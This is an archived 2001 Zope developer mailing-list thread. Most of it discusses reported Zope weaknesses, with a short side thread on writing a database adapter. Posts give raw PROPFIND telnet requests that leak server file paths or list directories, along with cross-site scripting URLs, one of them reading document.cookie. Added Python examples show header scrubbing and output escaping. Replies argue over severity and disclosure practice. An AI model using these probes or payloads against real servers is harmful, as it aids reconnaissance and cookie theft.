[Zope-dev] questions about writing a DA
Hi all,

I have several questions, and maybe you can give me some advice.

What I am trying to do is write a product which can communicate with ODBC Socket Server, a win32 server application that allows applications to have access to Data Sources managed by the Windows ODBC DataSource Administrator. And now a class written in Python can communicate with ODBC Socket Server. BTW, the class mentioned above handles the connection to the server, sending SQL statements, and receiving results.

As far as I know, in Zope, to access Data Sources one must create a Database Connection and ZSQLMethods associated with it to get the results. (But I have doubts about this; IMHO there must be some other way to do so, but what is it?)

Now I am rather confused about how to solve the problem.

First, is what I need to write a DA, or just a common product?

Second, if it's a DA, how can I use the existing class? I have read the article named "how to write a DA" in the how-tos, but it is quite abstract to me.

Third, where can I find more about the Database Connection and ZSQLMethod, especially on how they work together to access databases?

OK, I am not sure whether I have made myself understood; in fact, I am not quite clear myself. If you have any questions about that, I will reply ASAP.

Thanks for your great patience. I will be grateful if you can give me some advice.

Thank you!

Best wishes,
Yours sincerely,
Steven Lee

[Zope-dev] Vulnerability in Zope
Found vulnerability: retrieve a full path to local files in Zope.

---[ Example 1 (Linux):

telnet www.zope.org 80
PROPFIND / HTTP/1.0
F G H J K L

HTTP/1.0 500 Internal Server Error
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Mon, 10 Sep 2001 15:38:59 GMT
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py
Bobo-Exception-Type: TypeError
Content-Length: 7058
Ms-Author-Via: DAV
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py
Bobo-Exception-Type: TypeError
Content-Type: text/html
Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>Welcome to Zope.org</TITLE> <link rel="stylesheet" href="http://www.zope.org/zope_css" type="text/css"> </HEAD> <BODY B
Bobo-Exception-Line: 369
...
<!--
Traceback (innermost last):
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.py, line 160, in mapply
    (Object: PROPFIND)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 112, in call_object
    (Object: PROPFIND)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py, line 222, in PROPFIND
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 175, in apply
  File /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop
    (Object: Virtual)
TypeError: (see above)
-->

Host has closed connection.

---[ Example 2 (Linux):

telnet www.zope.com 80
/ HTTP/1.0
or
NOTREALCOMMAND / HTTP/1.0

HTTP/1.0 404 Not Found
Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
Date: Fri, 21 Sep 2001 12:51:48 GMT
Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py
Content-Type: text/html
Bobo-Exception-Type: NotFound
Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>Welcome to Zope.org</TITLE> <link rel="stylesheet" href="http://www.zope.org/zope_css" type="text/css"> </HEAD> <BODY B
Content-Length: 5845
Bobo-Exception-Line: 547
...
<!--
Traceback (innermost last):
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, in publish_module
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, in zpublisher_exception_hook
    (Object: ApplicationDefaultPermissions)
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 173, in publish
  File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody
  File /usr/loc

Re: [Zope-dev] Vulnerability in Zope
Do others consider this a vulnerability? While it reveals more information than people might want, I'm curious about scenarios under which it could be exploited.

If any of you know of something *specific*, meaning it's a genuinely exploitable vulnerability, please email me or Brian Lloyd ([EMAIL PROTECTED]) directly, rather than explain to the world how to do it.

--Paul

ALife wrote:
> Found vulnerability: retrieve a full path to local files in Zope.
>
> ---[ Example 1 (Linux):
>
> telnet www.zope.org 80
> PROPFIND / HTTP/1.0
> F G H J K L
>
> HTTP/1.0 500 Internal Server Error
> Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1
> Date: Mon, 10 Sep 2001 15:38:59 GMT
> Content-Length: 7058
> Ms-Author-Via: DAV
> Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py
> Bobo-Exception-Type: TypeError
> Content-Length: 7058
> Ms-Author-Via: DAV
> Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/PropertySheets.py
> Bobo-Exception-Type: TypeError
> Content-Type: text/html
> Bobo-Exception-Value: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <HTML> <HEAD> <TITLE>Welcome to Zope.org</TITLE> <link rel="stylesheet" href="http://www.zope.org/zope_css" type="text/css"> </HEAD> <BODY B
> Bobo-Exception-Line: 369
> ...
Re: [Zope-dev] questions about writing a DA
I just took a look at ODBC Socket Server, which I had never seen before. Pretty interesting! Here are some comments.

1) It looks like socket server opens a new socket for processing every request. In this respect, it goes against one of the benefits of database adapters, which keep a persistent connection.

2) Architecturally, socket server is very similar to web services. See the fishbowl proposal at dev.zope.org for more info. Thus, the approach that Zope would do for web services might have some similarity to what you'd like to do.

Alternatively, take a look at the adapter for Ultraseek search engine at http://www.zope.org/Members/brianh/UltraseekDA. It gives a model that might be useful to you.

3) Zope's approach of having separate objects that handle database connections provides the benefit that regular objects can't just fire up socket connections. You want a model that helps prevent all of Zope's threads from being stuck waiting on responses to socket requests.

4) SQL Methods provide some useful and important machinery for your socket server approach. First, I think you want site developers to think your thing is exactly the same as a regular SQL Method. Also:

- You likely want to keep the arguments list approach, to prevent people from inserting malicious data into the SQL requests.

- Even more than with current database adapters, you want to retain the caching feature in SQL Methods.

- Shoving the results into the Recordset code is something you might want to keep.

- Etc.

Good luck, this looks like a useful project!

--Paul

StevenLee wrote:
> Hi all,
>
> I have several questions, and maybe you can give me some advice.
>
> What I am trying to do is write a product which can communicate with ODBC Socket Server, a win32 server application that allows applications to have access to Data Sources managed by the Windows ODBC DataSource Administrator. And now a class written in Python can communicate with ODBC Socket Server. BTW, the class mentioned above handles the connection to the server, sending SQL statements, and receiving results.
>
> As far as I know, in Zope, to access Data Sources one must create a Database Connection and ZSQLMethods associated with it to get the results. (But I have doubts about this; IMHO there must be some other way to do so, but what is it?)
>
> Now I am rather confused about how to solve the problem.
>
> First, is what I need to write a DA, or just a common product?
>
> Second, if it's a DA, how can I use the existing class? I have read the article named "how to write a DA" in the how-tos, but it is quite abstract to me.
>
> Third, where can I find more about the Database Connection and ZSQLMethod, especially on how they work together to access databases?
>
> OK, I am not sure whether I have made myself understood; in fact, I am not quite clear myself. If you have any questions about that, I will reply ASAP.
>
> Thanks for your great patience. I will be grateful if you can give me some advice.
>
> Thank you!
>
> Best wishes,
> Yours sincerely,
> Steven Lee

___
Zope-Dev maillist - [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope-dev
** No cross posts or HTML encoding! **
(Related lists -
http://lists.zope.org/mailman/listinfo/zope-announce
http://lists.zope.org/mailman/listinfo/zope )

Re: [Zope-dev] Vulnerability in Zope
On Sun, Sep 23, 2001 at 10:36:33AM -0400, Paul Everitt wrote:
> Do others consider this a vulnerability? While it reveals more information than people might want, I'm curious about scenarios under which it could be exploited.
>
> If any of you know of something *specific*, meaning it's a genuinely exploitable vulnerability, please email me or Brian Lloyd ([EMAIL PROTECTED]) directly, rather than explain to the world how to do it.
> ...
> ...
> Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property

Think about social engineering.

Knowing this sort of thing, while this is not a vulnerability in itself, allows everybody to remotely know where Data.fs is.

bye,

Jerome Alet

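The disclosure discussed in this thread, as an added example that is not part of any post or of Zope's own code: a Python filter that a front-end proxy could apply to error responses. It reports the `Bobo-Exception-*` headers, the traceback comment and any source paths, then strips them and recomputes Content-Length. The sample response and its `/opt/example` path are constructed, and the function names are hypothetical.

```python
import re

# Header family added to error responses, as quoted in the thread.
LEAKY_PREFIX = b"bobo-exception-"
# Traceback appended to the error page as an HTML comment.
TRACEBACK = re.compile(rb"<!--\s*Traceback \(innermost last\):.*?-->", re.DOTALL)
# Absolute Unix path to a Python source file.
PY_PATH = re.compile(rb"/(?:[\w.-]+/)+[\w.-]+\.py")


def parse(raw):
    """Split a raw HTTP/1.x response into status line, header pairs and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, *lines = head.split(b"\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return status, headers, body


def audit(raw):
    """List what the response reveals about the server's filesystem."""
    _, headers, body = parse(raw)
    findings = ["header " + name.decode() for name, _ in headers
                if name.lower().startswith(LEAKY_PREFIX)]
    if TRACEBACK.search(body):
        findings.append("traceback comment in body")
    paths = set(PY_PATH.findall(body))
    for _, value in headers:
        paths.update(PY_PATH.findall(value))
    findings += ["path " + p.decode() for p in sorted(paths)]
    return findings


def scrub(raw):
    """Drop the leaky headers and the traceback; fix Content-Length to match."""
    status, headers, body = parse(raw)
    body = TRACEBACK.sub(b"", body)
    kept = [(n, v) for n, v in headers
            if not n.lower().startswith(LEAKY_PREFIX)
            and n.lower() != b"content-length"]   # may be duplicated upstream
    kept.append((b"Content-Length", str(len(body)).encode()))
    head = b"\r\n".join([status] + [n + b": " + v for n, v in kept])
    return head + b"\r\n\r\n" + body


# Constructed sample response (not captured from any real server).
_BODY = (
    b"<HTML><BODY>Not found</BODY></HTML>\n"
    b"<!--\nTraceback (innermost last):\n"
    b"  File /opt/example/lib/python/ZPublisher/Publish.py, line 223,"
    b" in publish_module\nNotFound\n-->"
)
SAMPLE = (
    b"HTTP/1.0 404 Not Found\r\n"
    b"Server: ExampleServer\r\n"
    b"Bobo-Exception-File: /opt/example/lib/python/ZPublisher/HTTPResponse.py\r\n"
    b"Bobo-Exception-Type: NotFound\r\n"
    b"Bobo-Exception-Line: 547\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: %d\r\n\r\n" % len(_BODY)
) + _BODY

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
    print(scrub(SAMPLE).decode())
```

The full traceback still belongs in the server-side log; the filter only keeps it off the wire.
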
[Zope-dev] New: Cross Site Scripting vulnerability
Example:

http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>

For example, an attacker might post a message like

Hello message board. This is a message.
<SCRIPT>malicious code</SCRIPT>
This is the end of my message.

When a victim with scripts enabled in their browser reads this message, the malicious code may be executed unexpectedly. Scripting tags that can be embedded in this way include <SCRIPT>, <OBJECT>, <APPLET>, and <EMBED>.

Re: [Zope-dev] Vulnerability in Zope
> Do others consider this a vulnerability?

Yup... especially given the hard-coded (sigh) error page returned for authentication error gives out this information :-(

Chris

Re: [Zope-dev] New: Cross Site Scripting vulnerability
> Hello message board. This is a message.
> <SCRIPT>malicious code</SCRIPT>
> This is the end of my message.

I don't really see your point other than a carelessly implemented app may expose these kinds of vulnerabilities.

Python (and hence Zope) has a library for stripping out this sort of malicious HTML. Search for Strip-o-Gram or Squishdot on Zope.org for examples of how this can be used.

cheers,

Chris

[Zope-dev] Vulnerability: attacking can get file list and directory
Vulnerability: attacking can get file list and directory

Tested on Win32 platform

Example:

telnet zopeserver 8080
PROPFIND / HTTP/1.0
enter enter enter

list files and directory

This tested on my site: security.instock.ru 8080

Re: [Zope-dev] New: Cross Site Scripting vulnerability
Aargh, I sent that first to [EMAIL PROTECTED] ...

> > Hello message board. This is a message.
> > <SCRIPT>malicious code</SCRIPT>
> > This is the end of my message.
>
> I don't really see your point other than a carelessly implemented app may expose these kinds of vulnerabilities.
>
> Python (and hence Zope) has a library for stripping out this sort of malicious HTML. Search for Strip-o-Gram or Squishdot on Zope.org for examples of how this can be used.

umm chris, you're right, but this example

http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>

executes the script. I don't exactly see why/where but I feel this really shouldn't happen. As I see it, it's more a problem of zope's standard_error page, which constructs links to the classic zope site. I don't see a zope-specific bug here, too.

cheers, oliver

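The reflected path described in the message above, as an added example that is not from the thread or from Zope's standard_error page: a 404 page builder that pastes the requested path in unchanged, beside one that encodes it for both the text and the link context. The host `classic.example.org` and all function names are assumptions; the probe path is the first URL quoted in the thread.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import quote

CLASSIC = "http://classic.example.org"  # placeholder host (assumption)
PAGE = ('<HTML><BODY><P>Sorry, %s was not found.</P>'
        '<A HREF="%s">Look on the classic site</A></BODY></HTML>')

# Path taken from the first example URL in the thread.
PROBE = "/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>"


def error_page_raw(path):
    """Before: the decoded request path goes into the page unchanged."""
    return PAGE % (path, CLASSIC + path)


def error_page_escaped(path):
    """After: each output context gets its own encoding."""
    text = escape(path, quote=False)        # HTML text node: &lt; &gt; &amp;
    url = CLASSIC + quote(path, safe="/")   # URL path: percent-encode
    href = escape(url, quote=True)          # then make it a safe attribute value
    return PAGE % (text, href)


class _StartTags(HTMLParser):
    """Collects the element names a parser sees as real markup."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.append(tag)


def live_tags(page):
    """Return the start tags parsed out of the page, in document order."""
    parser = _StartTags()
    parser.feed(page)
    parser.close()
    return parser.names


if __name__ == "__main__":
    print(live_tags(error_page_raw(PROBE)))      # includes 'script'
    print(live_tags(error_page_escaped(PROBE)))  # only the template's own tags
    print(error_page_escaped(PROBE))
```
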
Re: [Zope-dev] Vulnerability in Zope
Haven't we been complaining about this automatic appending of tracebacks for a while? To me this is what log files are for, but I'm not sure what this guy is on. I wouldn't count this as a security vulnerability.

- Original Message -
From: Chris Withers [EMAIL PROTECTED]
To: Paul Everitt [EMAIL PROTECTED]; ALife [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Sunday, September 23, 2001 10:44 AM
Subject: Re: [Zope-dev] Vulnerability in Zope

> > Do others consider this a vulnerability?
>
> Yup... especially given the hard-coded (sigh) error page returned for authentication error gives out this information :-(
>
> Chris

Re: [Zope-dev] New: Cross Site Scripting vulnerability
What does this have to do with Zope? It's down to an individual application.

- Original Message -
From: ALife [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Sunday, September 23, 2001 10:23 AM
Subject: [Zope-dev] New: Cross Site Scripting vulnerability

> Example:
>
> http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
> http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
> http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>
>
> For example, an attacker might post a message like
>
> Hello message board. This is a message.
> <SCRIPT>malicious code</SCRIPT>
> This is the end of my message.
>
> When a victim with scripts enabled in their browser reads this message, the malicious code may be executed unexpectedly. Scripting tags that can be embedded in this way include <SCRIPT>, <OBJECT>, <APPLET>, and <EMBED>.

Re: [Zope-dev] DISCUSS: Community checkins for CVS
> I imagine that the group will decide rules on peer reviewing. For comparison, the Mozilla group has very elaborate rules for checkins, while Python has pretty much an innocent until proven guilty culture. (That is, you check something in, and if somebody complains, it gets removed.) I don't think it is worthwhile trying to form these rules a priori.

That's fine. I just wanted to put it onto the agenda ...

> > We need rules like NO FIXES BETWEEN FINAL BETA AND RELEASE (Absolutely no fixes I mean) -- and those rules should apply to everybody.
>
> Again, we'll let the rules come out of the group. For instance, what if an Emacs #foo.py# accidentally got checked in? Would you really require another beta release for that? Betas are a cost incurred by hundreds of people around the world.

My personal opinion is that, apart from the version number, a final beta should be exactly the same as the actual release. Accidentally checked-in stuff can cause accidents. So there is some reason for a careful release policy. But in your specific case, if the final beta that should lead to a release has been actually released (and tagged in the CVS), how should somebody be able to check something into it afterwards? That could only happen if there are problems with the CVS configuration and usage I guess ...

> Ahh, the "it's the Wiki's fault" argument. I just checked the zip mailing list archive. 9 messages since Aug 1st. So neither email nor Wiki are good choices. Can you point to an example of a process that worked better for designing APIs?

I don't blame the Wiki in general. Wikis (together with mailing lists) are a good start. Sometimes we'd just need real meetings on real conferences I guess ...

Joachim

Re: [Zope-dev] New: Cross Site Scripting vulnerability
> Example:
>
> http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
> http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
> http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>
>
> For example, an attacker might post a message like
>
> Hello message board. This is a message.
> <SCRIPT>malicious code</SCRIPT>
> This is the end of my message.
>
> When a victim with scripts enabled in their browser reads this message, the malicious code may be executed unexpectedly. Scripting tags that can be embedded in this way include <SCRIPT>, <OBJECT>, <APPLET>, and <EMBED>.

First of all, I would appreciate it if you could send alleged security problems to us in private, and not advertise these on a public mailing list. I know that you had posted your previous 'discovery' to us in private some time before you took it to the public lists, but the time given to us to craft a response to your email was by far too short. One week would have been the absolute minimum!

Secondly, could you in future also describe the exact problem in more detail? I assume that you mean a malicious third party could in theory abuse our server to create a page with malicious client-side code by crafting a message on a message board or in an email, right? Your manner of posting could suggest to others that the vulnerability lies with Zope itself, not with browsers allowing malicious code via a generated web page.

Third, the 'classic.zope.org' link on the Zope.org error page has long been overdue for removal, especially since classic is now down. I have removed the auto-generated link to it.

--
Martijn Pieters
| Software Engineer mailto:[EMAIL PROTECTED]
| Zope Corporation http://www.zope.com/
| Creators of Zope http://www.zope.org/

Re: [Zope-dev] Vulnerability: attacking can get file list and directory
> Vulnerability: attacking can get file list and directory
>
> Tested on Win32 platform
>
> Example:
>
> telnet zopeserver 8080
> PROPFIND / HTTP/1.0
> enter enter enter
>
> list files and directory
>
> This tested on my site: security.instock.ru 8080

This one really seems to be the old "WebDAV is not safe" one. I guess it has been tackled already. You should be able to switch the file listing off for the Anonymous User in Zope 2.4.1 ...

Joachim